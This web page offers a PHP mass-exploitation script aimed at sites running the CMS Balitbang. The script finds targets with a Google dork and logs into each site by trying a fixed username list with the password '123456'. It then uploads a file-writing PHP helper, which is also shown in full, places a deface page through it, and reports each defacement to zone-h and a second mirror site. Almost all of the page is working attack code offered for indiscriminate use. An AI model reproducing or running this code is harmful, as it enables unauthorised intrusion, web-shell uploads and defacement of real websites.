facebook facebook twitter rss

CMS Balitbang Auto Exploiter

Author: Tu5b0l3d , Published: 14-07-2015

<?php

/*
Auto Exploiter CMS Balitbang by Tu5b0l3d
big thx to: Rieqyns13, sohai
#IndoXploit #Hacker-Newbie.org

*/
class auto{
    private 
$url;
    private 
$dork
    private 
$log=null;
    function 
__construct($file=null){
        echo 
"/*Auto Exploiter Balitang*/\n";
        echo 
"/*IndoXploit Coders Team*/\n\n";
        echo 
"[+]Masukkan Dork: ";
        
$fp fopen("php://stdin""rb");
        
$dork fgets($fp);
        
$dork str_replace(array("\n""\r""\r\n"), ""$dork);
        echo 
"[+]Masukkan jumlah situs yg discan: ";
        
$total fgets($fp);
        
$total str_replace(array("\n""\r""\r\n"), ""$total);
        
fclose($fp);
        
$this->dork $dork;
        
$this->total $total;
        
$this->log $file;
        
$this->scan();
    }
    function 
match($start$end$var){
        return 
preg_match_all("{".preg_quote($start).'(.*?)'.preg_quote($end)."}is"$var$m) ? $m[1] : null;
    }
    function 
curl($dork=null$x$url=null){
        
$ch curl_init();
        if(
$dork != null && is_numeric($x)){
            
curl_setopt($chCURLOPT_URL"http://www.google.com/custom?q=".urlencode($dork)."&btnG=Search&start=".urlencode($x));
        }elseif(
$url != null && $x==null){
            
curl_setopt($chCURLOPT_URL$url);
        }
        
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
        
curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_AUTOREFERERtrue );
        
curl_setopt($chCURLOPT_FAILONERRORtrue);
        
$exec curl_exec($ch);
        
curl_close($ch);
        return 
$exec;
    }
    function 
save($url){
        if(
$this->log != null){
            
$fp = @fopen($this->log"a") or die("cant open file");
            
fwrite($fp$url);
            
fclose($fp);
        }else return 
false;
    }
    function 
parse($urls){
        for(
$a=0$a<count($urls); $a++){
            
$dev parse_url($urls[$a]);
            @
$scheme[] = $dev['scheme'];
            @
$host[] = $dev['host'];
        }
        
$unik array_unique($host);
        foreach(
$unik as $key=>$url){
            
$urls_[] = $scheme[$key]."://".$url;
        }
        return 
$urls_;
    }
    function 
waktu($start){
        
$end time() - $start;
        
$detik round($end);
        echo 
"\n~selesai dalam {$detik} detik\n";
    }
    function 
scan(){
        
$start=0;
        
$total=0;
        
$mulai time();
        do{
            
$i=0;
            
$data $this->curl($this->dork$start);
            
$urls $this->match('<a class="l" href="''" onmousedown="'$data);
            if(
$urls==null){
                echo 
"~hasil tidak ada\n";
                
$this->waktu($mulai);
                exit;
            }
            
$urls_ $this->parse($urls);
            
$count count($urls_);
            if(
$count==0){
                echo 
"hasil tidak ada atau ada halangan captcha :p\n~keluar";
                
$this->waktu($mulai);
                exit;
            }
            
            do{
                
$urlq $urls_[$i];
                
$url_ $urlq."/member/index.php";
                
$scan $this->curl(nullnull$url_);
                echo 
$urlq;
                if(
preg_match("#username#is"$scan)){
                    echo 
"\n";
                    echo 
"-> wait..";
                    echo 
"\n";
                    
$usernames = array(
                    
"kepsek","masjava","taufik","tomi","alan","siswanto","wardjana","kickdody","choirulyogya","alumni","hafidz","070810120","farhan");
                    
                    foreach(
$usernames as $username){
                
$ch5 curl_init("$urlq/member/ajax_login.php");
                
curl_setopt($ch5CURLOPT_RETURNTRANSFER1);
                
curl_setopt($ch5CURLOPT_POST1);
                
curl_setopt($ch5CURLOPT_POSTFIELDS"user_name=$username&password=123456");
                
curl_setopt($ch5CURLOPT_COOKIEJAR,'coker_log');
                
curl_setopt($ch5CURLOPT_COOKIEFILE,'coker_log');
                
$exec11 curl_exec($ch5);
                
curl_close($ch5);
                
                if(
preg_match("#yes#si",$exec11)){
                echo 
"-> username cracked: ";
                echo 
$username;
                echo 
"\n";
                echo 
"-> lagi ngupload";
                
                
$uploadfile="ganteng4.php";
                        
$ch curl_init("$urlq/functions/simmateriguru.php");
                        
curl_setopt($chCURLOPT_POSTtrue);
                        
curl_setopt($chCURLOPT_POSTFIELDS,
                        array(
'file'=>"@$uploadfile"));
                        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                        
curl_setopt($chCURLOPT_COOKIEFILE"coker_log");
                        
$postResult curl_exec($ch);
                        
curl_close($ch);
                
                if (
$postResult == "<script>document.location.href = '../member/user.php?id=simmateri&kd=Perubahan Pengiriman Tugas dan File berhasil ';</script>") {
                        
$uploadfile2="hacked.php";
                        
$ch6 curl_init("$urlq/materi/file.php");
                        
curl_setopt($ch6CURLOPT_POSTtrue);
                        
curl_setopt($ch6CURLOPT_POSTFIELDS,
                        array(
'file3'=>"@$uploadfile2"));
                        
curl_setopt($ch6CURLOPT_RETURNTRANSFER1);
                        
curl_setopt($ch6CURLOPT_COOKIEFILE"coker_log");
                        
$postResult curl_exec($ch6);
                        
curl_close($ch6);
                        
                    
                    
$admin1 $this->curl(nullnull$urlq."/k.php");
                    
$zh   $urlq."/k.php";
                    if(
preg_match('#Hacked#is'$admin1)){
                    echo 
"\n";
                    echo 
"=> Berhasil mepes site...";
                    echo 
"\n";
                    
$this->save($urlq.'/k.php<br>');
                    echo 
$zh;
                    echo 
"\n";
                    
$ch3 curl_init ("http://www.zone-h.com/notify/single");
                        
curl_setopt ($ch3CURLOPT_RETURNTRANSFER1);
                        
curl_setopt ($ch3CURLOPT_POST1);
                        
curl_setopt ($ch3CURLOPT_POSTFIELDS"defacer=ID-IM&domain1=$zh&hackmode=1&reason=1");  // here put ur name on zone-h
                        
        
if (preg_match ("/color=\"red\">OK<\/font><\/li>/i"curl_exec ($ch3))){
                echo  
"[-]Zone-h  : Ok  "."\n\n";
        }else{
                echo 
"[-]Zone-h  : No"."\n"; }
                            
curl_close ($ch3);


                    echo 
"-> Security-Exploded: ";
                    
$ch8 curl_init ("http://www.security-exploded.org/mass_act.html");
                        
curl_setopt ($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt ($ch8CURLOPT_POST1);
                        
curl_setopt ($ch8CURLOPT_POSTFIELDS"hacker=Tu5b0l3d&team=IndoXploit Coders Team&url=$zh&poc=20");
                        
curl_setopt($ch8CURLOPT_RETURNTRANSFER1);
                        
curl_setopt($ch8CURLOPT_COOKIEFILE,"coker_log");
                        
$ps curl_exec($ch8);        
                        if (
preg_match("#SUCCESS#is"$ps)){
                                echo  
" ngk tau "."\n\n";
                        }else{
                        echo 
" ngk tau2 "."\n\n"; }
                            
curl_close ($ch8);
                    }else{
                    echo 
"\n";
                    echo 
"=> Site ngk kepepes";
                    echo 
"\n";
                    echo 
"\n";
                    break;
                    }
                
                    }
                    else {
                    echo 
"\n";
                    echo 
"-> ngk berhasil ngupload";
                    echo 
"\n";
                    echo 
"\n";
                    break;
                    }
                    }
                    else {
                    
                    }
                    }
                    }
                    else {
                    echo 
"-> Not Vuln";
                    echo 
"\n";
                    }
                   
                   
                   
                   
                   
                   
                   
                   
                
$total++;
                
$i++;
            }while(
$i<$count && $total<$this->total);
            
$start=$start+10;
        }while(
$total<$this->total);
        
$this->waktu($mulai);
        
    }
}


$gay = new auto("vuln-balitbang.htm");
?>



ganteng4.php
<?php
$file3 
$_FILES['file3'];
  
$newfile3="k.php";
        if (
file_exists("../".$newfile3)) unlink("../".$newfile3);
        
move_uploaded_file($file3['tmp_name'], "../$newfile3");
        
?>



hacked.php = script deface.

your page deface: http://site/k.php

Like us on Facebook :